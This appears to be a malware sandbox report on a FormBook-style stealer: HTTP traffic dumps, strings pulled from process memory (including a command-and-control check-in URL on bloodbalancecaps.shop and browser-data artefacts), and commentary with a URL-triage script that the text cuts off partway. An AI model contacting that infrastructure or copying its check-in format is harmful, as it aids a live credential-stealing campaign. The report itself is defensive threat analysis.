2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:43 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:37:46 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:38:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrbAJGBPqSekiNFNlLHlkWggZwRIBoCZeboYSGLKT88GqdIjBLj%2FtoG0oehOD2Hr%2BwCtriyKTCpNk2kTYGYqwJl4YFKnBBfY6aAe2pugIwxlTEwg7WsA7rLiYXnQl1nJ2rpoRfTjj9w%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eddb557eba0426a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1756&rtt_var=878&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=793&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:38:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ncRbJFQ0QFw%2BWH%2BDc0YIPq1OEGnzWQe%2BG%2BfsfdF57MPZpn6DMs81OjFhSkXissxUlPxwmIZIq%2FHuwb%2BQ9vyeVe4PTmssyDbl49YxPRY9Z2wb0PTfNw4uMpv6BA%2FBGVsr%2BBalXs7PsfY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eddb5689e41f78f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1659&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=813&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:38:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=klTNJjBKBRcyfJIazy2jYLVA0hRfmQr4XFeXLNL%2FP2eSQRU9lEJID8mbAMkExn3sZ71P%2FfDl3RsR1bjUcyxVKV%2FniUxWWLu5KGQBt5ae4r3V73kgWWqi1ml%2BOGhqUJNQB3oX9zj4a%2F4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eddb5798d5fef9f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=29696&min_rtt=29696&rtt_var=14848&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1826&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:38:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xUKvpOayw%2FbaN0zwn70sunYJryCSswQyyAn3CKPqEpaf3Tjq7Iupbufkoy1HRwY8rJM60Vi4bseWikiCm6QPe1uPnUS0QDp0pR0uo%2BiZsXAgHAzolQ%2FlbCHY50gpkaRj1YnVU%2BjYoKk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eddb589f82842da-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=519&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:39:03 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15183Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 08 21 cb 4d c7 a4 2a 2f 27 d9 94 36 98 b0 a0 25 b3 d0 20 76 9e a3 b2 2c cf 05 0f 99 e5 4a 76 b5 31 bf bb cf 04 5e b9 96 93 06 f9 42 b3 bf 15 6a 4c be 03 88 1a 55 a3 46 6a 6d 6e fc 03 ed ba 31 66 76 1b af d6 94 44 80 82 66 b8 ab df fe 55 73 65 4e 23 81 15 ae c4 6c b3 31 a1 e6 b9 bd 3d 9b 71 19 a9 59 e7 fd 2c 87 4c 7d e0 3f 82 b5 5c 26 86 4c c8 a2 11 30 03 7f d5 a2 e1 2f f1 7f e9 fe d2 35 9d 59 47 e9 e4 97 6e 69 13 f3 0b 82 6b f8 a5 5b 16 ff d2 ed 8d 3a 5e 67 f0 4b f7 b2 7f 7f d9 ff a5 db 68 
37 e0 de 62 7d 27 97 09 be 98 69 f2 32 3c 2c 2c d1 f0 f7 db 0a 10 4f ee 5d 15 3a 84 86 bf 68 a0 3f 50 c0 b2 6c 89 5f c2 d7 0a f2 4b 77 96 a3 1f 43 51 44 ae e3 07 53 06 ca 5a 8a 0b 02 1c bb 93 71 d9 f9 60 7e 3f 05 3d b9 e8 5c 76 7a 8d 87 87 f1 59 f7 cb b7 e4 a7 94 1b 12 73 01 04 7f 9d d3 69 02 12 34 f6 8e c8 97 dd b3 b7 71 21 43 b7 c8 26 6f cb d6 62 ca 34 51 6d d3 86 f1 2a 4e c2 26 b4 16 56 cf cb 3b 3b 59 98 22 cf 95 b6 3f 81 b1 c6 87 b6 e5 19 9e 58 96 fb 4d 09 33 f2 0d 02 b7 3a 53 26 0a f8 21 6e b6 1e c6 06 8c 41 98 1f ad d2 28 58 c7 80 fd 1e c7 6e aa f6 7f f9 f1 87 7f ea 18 ab 71 7d 3c 9e 37 6d ab f5 80 8a 84 a9 6b f7 f0 b0 6e 9f 37 b1 87 a3 06 9d 10 47 d5 7f 81 d0 36 bd b6 d7 c6 77 26 a7 0c 17 c2 23 9b 6e 5e 53 e0 49 6a 5b 18 c0 a9 c5 4f b8 d0 a6 c5 74 af 35 ae 06 70 2c ff ca a5 1d f4 bf d2 9a cd 9b d0 49 90 93 db 26 72 67 a7 40 77 22 4c 6c Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:39:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15183Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 08 21 cb 4d c7 a4 2a 2f 27 d9 94 36 98 b0 a0 25 b3 d0 20 76 9e a3 b2 2c cf 05 0f 99 e5 4a 76 b5 31 bf bb cf 04 5e b9 96 93 06 f9 42 b3 bf 15 6a 4c be 03 88 1a 55 a3 46 6a 6d 6e fc 03 ed ba 31 66 76 1b af d6 94 44 80 82 66 b8 ab df fe 55 73 65 4e 23 81 15 ae c4 6c b3 31 a1 e6 b9 bd 3d 9b 71 19 a9 59 e7 fd 2c 87 4c 7d e0 3f 82 b5 5c 26 86 4c c8 a2 11 30 03 7f d5 a2 e1 2f f1 7f e9 fe d2 35 9d 59 47 e9 e4 97 6e 69 13 f3 0b 82 6b f8 a5 5b 16 ff d2 ed 8d 3a 5e 67 f0 4b f7 b2 7f 7f d9 ff a5 db 68 
37 e0 de 62 7d 27 97 09 be 98 69 f2 32 3c 2c 2c d1 f0 f7 db 0a 10 4f ee 5d 15 3a 84 86 bf 68 a0 3f 50 c0 b2 6c 89 5f c2 d7 0a f2 4b 77 96 a3 1f 43 51 44 ae e3 07 53 06 ca 5a 8a 0b 02 1c bb 93 71 d9 f9 60 7e 3f 05 3d b9 e8 5c 76 7a 8d 87 87 f1 59 f7 cb b7 e4 a7 94 1b 12 73 01 04 7f 9d d3 69 02 12 34 f6 8e c8 97 dd b3 b7 71 21 43 b7 c8 26 6f cb d6 62 ca 34 51 6d d3 86 f1 2a 4e c2 26 b4 16 56 cf cb 3b 3b 59 98 22 cf 95 b6 3f 81 b1 c6 87 b6 e5 19 9e 58 96 fb 4d 09 33 f2 0d 02 b7 3a 53 26 0a f8 21 6e b6 1e c6 06 8c 41 98 1f ad d2 28 58 c7 80 fd 1e c7 6e aa f6 7f f9 f1 87 7f ea 18 ab 71 7d 3c 9e 37 6d ab f5 80 8a 84 a9 6b f7 f0 b0 6e 9f 37 b1 87 a3 06 9d 10 47 d5 7f 81 d0 36 bd b6 d7 c6 77 26 a7 0c 17 c2 23 9b 6e 5e 53 e0 49 6a 5b 18 c0 a9 c5 4f b8 d0 a6 c5 74 af 35 ae 06 70 2c ff ca a5 1d f4 bf d2 9a cd 9b d0 49 90 93 db 26 72 67 a7 40 77 22 4c 6c Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 16:39:08 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15183Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 5d 97 e3 46 92 25 f8 9c f1 2b 3c a9 23 05 a9 a2 93 e0 57 7c 80 c1 a8 92 52 52 b7 66 aa 5a 75 4a aa e9 9d 91 b4 39 0e c0 00 78 86 c3 1d e5 ee 20 83 c9 8e 1f d3 67 1e f6 69 9f f6 ec cb be ea 8f ad 39 c0 ef 00 19 8c c8 e8 ae e9 66 04 41 87 b9 d9 b5 6b d7 ee cd db 6f 7e 78 f7 d3 7f ff f3 b7 24 b5 99 b8 3d bb 71 3f 44 30 99 4c 1a b9 a5 7f fe a9 e1 62 c0 a2 db b3 37 37 19 58 46 c2 94 69 03 76 d2 f8 eb 4f df d1 ab 06 e9 ae 6f 24 cb 60 d2 98 72 98 e5 4a db 06 09 95 b4 20 31 73 c6 23 9b 4e 22 98 f2 10 68 f9 d2 26 5c 72 cb 99 a0 26 64 02 26 bd 12 67 0b e6 5c ab 40 59 73 be 06 39 cf d8 3d e5 19 4b 80 e6 1a 5c 13 5f 30 9d c0 79 45 c0 d8 b9 80 5b 9e 25 3e 37 cd 9f 0d ff 08 66 d2 60 85 55 0d c2 7f 6d 93 2a f2 7f 56 a1 b6 8b b5 c8 a2 c4 66 5c 52 2e ad e6 d2 f0 90 ba 34 9f 0c 3c cf cb ef 49 6f 54 fe 3c dc 74 2b 74 6c 63 b9 c5 c3 9f 7f fb d7 84 4b 64 fa db ff 52 04 a4 83 d1 2c 62 37 dd ea fa ec 46 70 79 47 34 88 c9 79 24 8d e3 1b 83 0d d3 73 92 e2 69 72 de ed 06 42 a9 28 60 28 73 08 21 cb 4d c7 a4 2a 2f 27 d9 94 36 98 b0 a0 25 b3 d0 20 76 9e a3 b2 2c cf 05 0f 99 e5 4a 76 b5 31 bf bb cf 04 5e b9 96 93 06 f9 42 b3 bf 15 6a 4c be 03 88 1a 55 a3 46 6a 6d 6e fc 03 ed ba 31 66 76 1b af d6 94 44 80 82 66 b8 ab df fe 55 73 65 4e 23 81 15 ae c4 6c b3 31 a1 e6 b9 bd 3d 9b 71 19 a9 59 e7 fd 2c 87 4c 7d e0 3f 82 b5 5c 26 86 4c c8 a2 11 30 03 7f d5 a2 e1 2f f1 7f e9 fe d2 35 9d 59 47 e9 e4 97 6e 69 13 f3 0b 82 6b f8 a5 5b 16 ff d2 ed 8d 3a 5e 67 f0 4b f7 b2 7f 7f d9 ff a5 db 68 
37 e0 de 62 7d 27 97 09 be 98 69 f2 32 3c 2c 2c d1 f0 f7 db 0a 10 4f ee 5d 15 3a 84 86 bf 68 a0 3f 50 c0 b2 6c 89 5f c2 d7 0a f2 4b 77 96 a3 1f 43 51 44 ae e3 07 53 06 ca 5a 8a 0b 02 1c bb 93 71 d9 f9 60 7e 3f 05 3d b9 e8 5c 76 7a 8d 87 87 f1 59 f7 cb b7 e4 a7 94 1b 12 73 01 04 7f 9d d3 69 02 12 34 f6 8e c8 97 dd b3 b7 71 21 43 b7 c8 26 6f cb d6 62 ca 34 51 6d d3 86 f1 2a 4e c2 26 b4 16 56 cf cb 3b 3b 59 98 22 cf 95 b6 3f 81 b1 c6 87 b6 e5 19 9e 58 96 fb 4d 09 33 f2 0d 02 b7 3a 53 26 0a f8 21 6e b6 1e c6 06 8c 41 98 1f ad d2 28 58 c7 80 fd 1e c7 6e aa f6 7f f9 f1 87 7f ea 18 ab 71 7d 3c 9e 37 6d ab f5 80 8a 84 a9 6b f7 f0 b0 6e 9f 37 b1 87 a3 06 9d 10 47 d5 7f 81 d0 36 bd b6 d7 c6 77 26 a7 0c 17 c2 23 9b 6e 5e 53 e0 49 6a 5b 18 c0 a9 c5 4f b8 d0 a6 c5 74 af 35 ae 06 70 2c ff ca a5 1d f4 bf d2 9a cd 9b d0 49 90 93 db 26 72 67 a7 40 77 22 4c 6c Data Ascii: ]F%+<#W|RRfZuJ9x gi9fAko~x$=q?D0Lb77XFivOo$`rJ
                Source: regini.exe, 00000006.00000002.4819056247.0000000005010000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000046F0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6
                Source: RsbLJIqaDYs.exe, 00000007.00000002.4819665494.00000000051EF000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.bloodbalancecaps.shop
                Source: RsbLJIqaDYs.exe, 00000007.00000002.4819665494.00000000051EF000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.bloodbalancecaps.shop/qimy/
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 00000006.00000002.4819056247.00000000049C8000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000040A8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:regular
                Source: regini.exe, 00000006.00000002.4821060056.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.00000000049C8000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000040A8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 00000006.00000002.4815970575.0000000002A98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 00000006.00000003.2950852511.000000000792A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 00000006.00000002.4821060056.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.0000000004B5A000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.0000000004CEC000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000043CC000.00000004.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.000000000423A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
                Source: regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
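Only the bloodbalancecaps.shop entries in the list above are command-and-control material. The first of them has the shape FormBook check-ins use: one short directory (here /qimy/) followed by exactly two query parameters, a short identifier and a long base64-like payload. The ecosia, duckduckgo, yahoo and google entries are the search-engine template URLs (suggest, favicon and new-tab templates) that Chromium keeps in its Web Data database, which is what ends up in a stealer's memory when it reads browser data, and the login.live.com entries are Windows' own Microsoft-account endpoints. The script below is an added example, not part of the Joe Sandbox report: it parses string-extraction lines in either the clean or the run-together form, splits URLs that memory dumps concatenate (favicon.icohttps://...), and sorts them into C2 candidates versus harvesting artefacts. The check-in regex, the length thresholds and the search-provider allow-list are this example's assumptions; the sample lines are constructed from the report's URLs with shortened dump identifiers.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in the shape of the report's string-extraction lines
# (memory-dump identifiers shortened; the URLs are those listed above).
SAMPLE_STRINGS = """\
Source: regini.exe, 00000006.00000002.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.sdmp String found in binary or memory: http://bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6
Source: RsbLJIqaDYs.exe, 00000007.00000002.sdmp String found in binary or memory: http://www.bloodbalancecaps.shop
Source: RsbLJIqaDYs.exe, 00000007.00000002.sdmp String found in binary or memory: http://www.bloodbalancecaps.shop/qimy/
Source: regini.exe, 00000006.00000003.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: regini.exe, 00000006.00000003.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
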